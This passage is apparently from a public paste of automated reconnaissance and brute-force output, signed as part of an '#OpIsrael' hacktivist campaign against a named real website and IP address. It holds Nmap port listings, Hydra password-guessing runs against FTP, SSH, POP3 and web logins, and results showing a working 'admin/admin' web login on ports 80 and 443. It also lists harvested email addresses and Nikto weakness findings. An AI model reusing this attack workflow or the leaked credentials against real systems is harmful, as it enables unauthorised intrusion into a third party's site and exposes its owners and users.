  2306. | JBoss Status Servlet | http://143.95.226.53:80/status | ./auxiliary/scanner/http/jboss_status.rb | None | None |
  2307. +----------------------+--------------------------------------+------------------------------------------------+----------+----------+
  2308. ######################################################################################################################################
  2309. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 11:01 EST
  2310. Nmap scan report for www.israelshofar.com (143.95.226.53)
  2311. Host is up (0.22s latency).
  2312. Not shown: 16 closed ports, 1 filtered port
  2313. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2314. PORT STATE SERVICE
  2315. 21/tcp open ftp
  2316. 22/tcp open ssh
  2317. 53/tcp open domain
  2318. 80/tcp open http
  2319. 110/tcp open pop3
  2320. 443/tcp open https
  2321. 993/tcp open imaps
  2322. 3306/tcp open mysql
  2323. 8080/tcp open http-proxy
  2324. #######################################################################################################################################
  2325. + -- --=[Port 21 opened... running tests...
  2326. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2327.  
  2328. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-14 11:02:08
  2329. [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
  2330. [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
  2331. [DATA] attacking ftp://www.israelshofar.com:21/
  2332. [STATUS] 14.00 tries/min, 14 tries in 00:01h, 214 to do in 00:16h, 1 active
  2333. [STATUS] 8.67 tries/min, 26 tries in 00:03h, 202 to do in 00:24h, 1 active
  2334. [STATUS] 7.14 tries/min, 50 tries in 00:07h, 178 to do in 00:25h, 1 active
  2335. [STATUS] 6.33 tries/min, 76 tries in 00:12h, 152 to do in 00:25h, 1 active
  2336. [STATUS] 6.06 tries/min, 103 tries in 00:17h, 125 to do in 00:21h, 1 active
  2337. [STATUS] 6.06 tries/min, 109 tries in 00:18h, 119 to do in 00:20h, 1 active
  2338. [STATUS] 6.00 tries/min, 114 tries in 00:19h, 114 to do in 00:20h, 1 active
  2339. [STATUS] 5.90 tries/min, 118 tries in 00:20h, 110 to do in 00:19h, 1 active
  2340. [STATUS] 5.90 tries/min, 124 tries in 00:21h, 104 to do in 00:18h, 1 active
  2341. [STATUS] 5.86 tries/min, 129 tries in 00:22h, 99 to do in 00:17h, 1 active
  2342. [STATUS] 5.78 tries/min, 133 tries in 00:23h, 95 to do in 00:17h, 1 active
  2343. [STATUS] 5.79 tries/min, 139 tries in 00:24h, 89 to do in 00:16h, 1 active
  2344. [STATUS] 5.72 tries/min, 143 tries in 00:25h, 85 to do in 00:15h, 1 active
  2345. [STATUS] 5.69 tries/min, 148 tries in 00:26h, 80 to do in 00:15h, 1 active
  2346. [STATUS] 5.70 tries/min, 154 tries in 00:27h, 74 to do in 00:13h, 1 active
  2347. [STATUS] 5.75 tries/min, 161 tries in 00:28h, 67 to do in 00:12h, 1 active
  2348. [STATUS] 5.72 tries/min, 166 tries in 00:29h, 62 to do in 00:11h, 1 active
  2349. [STATUS] 5.70 tries/min, 171 tries in 00:30h, 57 to do in 00:11h, 1 active
  2350. [STATUS] 5.71 tries/min, 177 tries in 00:31h, 51 to do in 00:09h, 1 active
  2351. [STATUS] 5.75 tries/min, 184 tries in 00:32h, 44 to do in 00:08h, 1 active
  2352. [STATUS] 5.70 tries/min, 188 tries in 00:33h, 40 to do in 00:08h, 1 active
  2353. [STATUS] 5.65 tries/min, 192 tries in 00:34h, 36 to do in 00:07h, 1 active
  2354. [STATUS] 5.63 tries/min, 197 tries in 00:35h, 31 to do in 00:06h, 1 active
  2355. [STATUS] 5.64 tries/min, 203 tries in 00:36h, 25 to do in 00:05h, 1 active
  2356. [STATUS] 5.59 tries/min, 207 tries in 00:37h, 21 to do in 00:04h, 1 active
  2357. [STATUS] 5.55 tries/min, 211 tries in 00:38h, 17 to do in 00:04h, 1 active
  2358. 1 of 1 target completed, 0 valid passwords found
  2359. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-14 11:40:27
  2360. + -- --=[Port 22 opened... running tests...
  2361. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2362.  
  2363. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-14 11:40:28
  2364. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  2365. [DATA] attacking ssh://www.israelshofar.com:22/
  2366. [ERROR] could not connect to ssh://143.95.226.53:22 - kex error : no match for method kex algos: server [diffie-hellman-group-exchange-sha256], client [curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1]
  2367. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2368.  
  2369. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-14 11:40:29
  2370. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2371. [DATA] attacking ssh://www.israelshofar.com:22/
  2372. [ERROR] could not connect to ssh://143.95.226.53:22 - kex error : no match for method kex algos: server [diffie-hellman-group-exchange-sha256], client [curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1]
  2373. + -- --=[Port 23 closed... skipping.
  2374. + -- --=[Port 25 closed... skipping.
  2375. + -- --=[Port 80 opened... running tests...
  2376. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2377.  
  2378. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-14 11:40:35
  2379. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2380. [DATA] attacking http-get://www.israelshofar.com:80//
  2381. [80][http-get] host: www.israelshofar.com login: admin password: admin
  2382. [STATUS] attack finished for www.israelshofar.com (valid pair found)
  2383. 1 of 1 target successfully completed, 1 valid password found
  2384. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-14 11:40:36
  2385. + -- --=[Port 110 opened... running tests...
  2386. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2387.  
  2388.  
  2389. 1 of 1 target completed, 0 valid passwords found
  2390. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-14 18:45:44
  2391. + -- --=[Port 139 closed... skipping.
  2392. + -- --=[Port 162 closed... skipping.
  2393. + -- --=[Port 389 closed... skipping.
  2394. + -- --=[Port 443 opened... running tests...
  2395. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2396.  
  2397. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-14 18:45:44
  2398. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2399. [DATA] attacking http-gets://www.israelshofar.com:443//
  2400. [443][http-get] host: www.israelshofar.com login: admin password: admin
  2401. [STATUS] attack finished for www.israelshofar.com (valid pair found)
  2402. 1 of 1 target successfully completed, 1 valid password found
  2403. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-14 18:45:49
  2404. + -- --=[Port 445 closed... skipping.
  2405. + -- --=[Port 512 closed... skipping.
  2406. + -- --=[Port 513 closed... skipping.
  2407. + -- --=[Port 514 closed... skipping.
  2408. + -- --=[Port 993 opened... running tests...
  2409. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2410.  
  2411. #####################################################################################################################################
  2412. | E-mails:
  2413. | [+] E-mail Found: sales@israelshofar.com
  2414. | [+] E-mail Found: sales@talit.com
  2415. | [+] E-mail Found: mailman@www.israelshofar.com
  2416. ######################################################################################################################################
  2417. --------------------------------------------------------------------------------------------------------------------------------------
  2418. + Target IP: 143.95.226.53
  2419. + Target Hostname: 143.95.226.53
  2420. + Target Port: 443
  2421. --------------------------------------------------------------------------------------------------------------------------------------
  2422. + SSL Info: Subject: /OU=Domain Control Validated/OU=Hosted by HostGator.com, LLC./OU=PositiveSSL Wildcard/CN=*.arvixeshared.com
  2423. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
  2424. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
  2425. + Start Time: 2018-11-13 20:57:49 (GMT-5)
  2426. ---------------------------------------------------------------------------------------------------------------------------------------
  2427. + Server: nginx/1.14.1
  2428. + The anti-clickjacking X-Frame-Options header is not present.
  2429. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2430. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  2431. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2432. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  2433. + Server is using a wildcard certificate: *.arvixeshared.com
  2434. + Hostname '143.95.226.53' does not match certificate's names: *.arvixeshared.com
  2435. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  2436. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  2437. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  2438. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
  2439. : Connection timed out
  2440. + Scan terminated: 12 error(s) and 10 item(s) reported on remote host
  2441. + End Time: 2018-11-13 21:55:09 (GMT-5) (3440 seconds)
  2442. ---------------------------------------------------------------------------------------------------------------------------------------
  2443. #######################################################################################################################################
  2444. Anonymous JTSEC #OpIsrael Full Recon #13
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement